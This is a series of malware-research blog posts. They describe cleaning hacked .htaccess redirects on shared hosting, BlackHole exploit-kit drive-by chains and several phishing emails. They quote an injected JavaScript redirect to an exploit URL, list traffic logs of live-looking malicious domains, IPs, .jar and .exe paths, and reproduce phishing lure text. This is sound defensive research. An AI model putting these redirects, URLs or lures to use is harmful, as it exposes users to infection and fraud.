The hunt for the secret malicious .htaccess file

Posted on by
Reply

Yesterday I cleaned up the largest web malware infection I have ever done. It involved 18 infected websites (77,518 php and html files) hosted on GoDaddy.

I am documenting the process here as it may help other people.

One of the main symptoms that lead to the first identification was a redirection to a Fake AV site. Digging deeper I only found more bad stuff…

Fake AV scam:

The redirection is done through tradehilton.ru and tradeincas.ru.

Porn redirections:

A PayPal phishing scam:

Backdoors and shells:

The main redirection was orchestrated by a whopping 181 infected .htaccess files. Here is what a hacked.htaccess file looks like:

As you can see, any request from that site that matches the criteria is sent to the malicious site “tradeincas.ru“.

The cleanup process started with a complete local backup of the entire directory structure (18 websites). This was done through FTP and took a full night.

After removing all backdoors and cleansing the .htaccess files the redirection was still happening and that left me puzzled. I had used all the grep commands I could think of and was certain all the bad stuff was gone.

At this point I requested our customer to ask for SSH access. GoDaddy has a security policy in place where they will phone you to give you a pin that lets you activate SSH. This is very good practice and they were quick about it.

While SSH gave me direct access to run my commands, one issue made my job more difficult. One particular command (grep -r -l ‘tradeincas’ *) would not complete. It seemed to time out after a few minutes with an error of “Terminated”. This could have been due to the very large directory structure and possibly a safety mechanism from GoDaddy’s side that limits the amount of CPU given to a particular user on a shared hosting.

This annoyed me greatly as I now had to run that command on each folder one by one. But then something came to mind and I went back to the very root of the folder and ran a special command:

find . -name .htaccess -exec grep ‘tradeincas’ {} \;

For some reason, this command would not generate the error mentioned above and it found the one .htaccess file that was tormenting me. However, this file was located one directory above what the FTP access gave me as root, meaning I would never have been able to find it without SSH:

In FTP both using GoDaddy’s web version and FileZilla, the top directory is html, while with SSH I can go back to one above:

So, despite cleaning the other 181 .htaccess files, it would never stop redirecting until the main one sitting at the very top was taken care of.

After renaming it to .htaccess.bak (creates a backup and disables it), everything went back to normal.

Part of the operation involved updating 8 Joomla websites which I did simultaneously using as many FileZilla windows to upload the new Joomla setups.

A few things learned: SSH is crucial to cleaning up an infected website. It can be done with  FTP sometimes but overall SSH is way faster and more thorough. The GoDaddy user interface to manage your account is not very user-friendly to say the least. What bothered me the most was to click on links that redirected me to services I needed to buy while I was looking for functional features. Mixing the marketing promo stuff with account settings is a cheap way to try to generate more revenues from your customers while frustrating them at the same time. However, the GoDaddy team was quick to respond and professional, so maybe that evens things out.

Jerome Segura

Back to the Citi malware

Posted on by
Reply

This spam email is not a phishing scam that is after your banking information (at least not right away). Instead, it wants to add your computer to a large botnet.

Clicking on the link launching the drive-by download infection. It’s one of those situations where you can’t finish swearing before it’s too late:

A successful infection loads the following:

tradifrance.net/NGxo03v6/index.html
urbannex.co.za/SVVsEJwY/js.js
shokani.net/YvKDGVwn/js.js
69.194.194.90/showthread.php?t=4a6d866826776084
69.194.194.90/favicon.ico
69.194.194.90/Cal.jar
69.194.194.90/data/hcp_vbs.php?f=0cf26&d=0
69.194.194.90/q.php?f=0cf26&e=0
69.194.194.90/q.php?e=5&f=0cf26

The java exploit currently has 0 detection on VirusTotal.

Jerome Segura

Exposed Intranet serves malware

Posted on by
Reply

A simple Google search for a malware string reveals a private intranet site, not so private…

This company’s court records are publicly available. The data which contains sensitive information has been sanitized for obvious reasons.

As if that wasn’t enough, the page is also a host for a malicious script (a0v.org/x.js):

What is worse? Data leak or malware? You be the judge.

To publish or not to publish malware links?

Posted on by
Reply

Today I got into a little debate on Twitter with fellow researchers @dimitribest@nicolasbrulez@virusbtn about whether or not publishing malware links in blog postings is acceptable.

Here is my opinion on the debate:

  • Large security companies are tied to potential legal issues and posting malicious URLs within a blog presents a risk. I do believe the researchers who say they want to prevent unnecessary infections, but at the same time I feel like the big corporations they work for are more worried about possible lawsuits with people clicking links by mistake and infecting their PC. For them, it could be legal battles costing them millions of dollars.
  • Including malicious links is used by many as a marketing / SEO technique to generate buzz and traffic. Naming (and shaming) a well-known website means you get your name in the press with all the benefits it entails.
  • In some cases, including full links can be used to prove that you indeed discover something (and not just made it up).
  • Many security researchers, including myself, post full links because we feel we should share our discovery with others. I like to read other people’s blogs and follow such and such links they posted to do my own bit of research. Sure, I could ask them but it introduces barriers etc…

Is the argument that people can get infected really valid? I think taking the necessary precautions such as including a disclaimer, making the links non clickable, and labeling them clearly as harmful is enough. The argument that people can still copy and paste the link to get infected is weak in my opinion. If someone really did that, they are making a conscious decision… it is not just an accidental click of the mouse… After all, Google doesn’t prevent people from copying and pasting in its “this site may harm your computer”, it just blocks the hyperlink:

However, I think there are a couple of exceptions to openly sharing malicious links:

  • In some cases, you may not want to make a powerful tool (such as an exploit toolkit) available to the masses. By publishing the link, you could easily ‘give away’ a weapon to people who have the intent of using it for their own good to harm other users.
  • Some malware research can involve sensitive data and not letting the cat out of the bag makes sense. Obfuscating or blurring the URL can protect the writer against personal reprisals from malware authors, or simply to not let the bad guys know you have penetrated their network.

Jerome Segura

Exploit-friendly domain, malware and a very dirty French host

Posted on by
Reply

Our journey starts with domain (hxxp://jbhx0aibh1zl.az.pl/ - IP address: 109.234.111.23 Poland) that hosts several landing pages typical of the drive-by download exploits we see with the BlackHole kit.

There’s also one folder 7X0GYVjk where we find a sample of the Zbot Trojan family:

The actual exploit-driven pages (all the other folders) contain a redirect to a malicious javascript:

hunmuhendislik.com (IP address: 95.173.190.224 Turkey)

The javasscript file js.js contains one line, which is our final destination and where our fun begins:

document.location=’hxxp://91.121.84.204:8080/showthread.php?t=977334ca118fcb8c‘;

Location: Roubaix, France.

That link is an exploit URL, although it is no longer active.

Other domains on that IP include one about the best of the web:

Apparently it is limited to porn, webcams, warez and free movies:

Another domain on the same IP that is loaded with malware: gamespile.fr

The garbled code translates into iframes (big surprise):

hxxp://cibudit.ru/count20.php
hxxp://jazzute.ru/count5.php

So all in all, that IP is not somewhere you want to hang out too often. ;-)

Jerome Segura

Canada Revenue Agency scam

Posted on by
Reply

Today is the deadline for submitting your tax return (in Canada). So receiving the following email may seem like the perfect timing:

Recent annual calculation of your fiscal activity, our record indicate you are eligible
to receive a tax refund of $1500.00 (PENDING) Please submit a verified tax refund
request and allow us in order to process it. Click the “Refund Me Now” link below and
follow the on screen step in order to have us process your request.

The link (zoe-flury.com/wp-content/plugins/sitemap-generator/index.html) is thankfully no longer active.

Jerome Segura

Skype phishing scam

Posted on by
Reply

Skype scam:

Dear Skype Member:

As part of our security measures, we regularly screen activity in the Skype system.We recently contacted you after noticing an issue on your account
This is the Last reminder to log in to Skype as soon as possible. Once you log in, you will be provided with steps to restore your account access.
We appreciate your understanding as we work to ensure account safety.

Fortunately, the link (mvstudioweb.com/templates/atomic/html/mod_menu/intl/en/account/login/) is no longer working.

Jerome Segura

Verizon spam loads malware

Posted on by
Reply

Verizon customers beware. If you are set to receive and pay your bills online, this email scam could very well fool you and infect your PC:

Your bill payment has been applied to your Verizon Wireless account.

Traffic log:

contrastiurbani.it/8Qz8bX23/index.html
fvdproducciones.com/RjkyjNmn/js.js
satilikarsabursa.net/U3N91Zxm/js.js
77.79.9.54/showthread.php?t=d7ad916d1c0396ff
77.79.9.54/favicon.ico
77.79.9.54/Edu.jar
77.79.9.54/data/hcp_vbs.php?f=ba33e&d=0
77.79.9.54/q.php?f=ba33e&e=0
77.79.9.54/q.php?e=5&f=ba33e
64.244.61.40/rUPYeVt0.exe

The exploit is located on a Lithuanian server (77.79.9.54).

Jerome Segura

Look for a job, get malware

Posted on by
Reply

If you are looking for a job, don’t blindly click on the first offer you see in your mailbox:

The link loads ‘additional information’ (exploit page)

Traffic log:

chinesetruck.ru/car.html
masterisland.net/main.php?page=975982764ed58ec3
chinesetruck.ru/favicon.ico
masterisland.net/Edu.jar
masterisland.net/data/hcp_vbs.php?f=58e0f&d=0
masterisland.net/w.php?f=58e0f&e=0
masterisland.net/w.php?e=5&f=58e0f
prakticalcex.ru/mev/in/
nalezivmordu.in/mev/in/
zorberzorberzu.ru/mev/in/

Here is the login page for the corresponding exploit kit (BlackHole):

One of the exploits (Java) is not detected by any AV on VirusTotal:

Edu.jar (VirusTotal 0/42)

Jerome Segura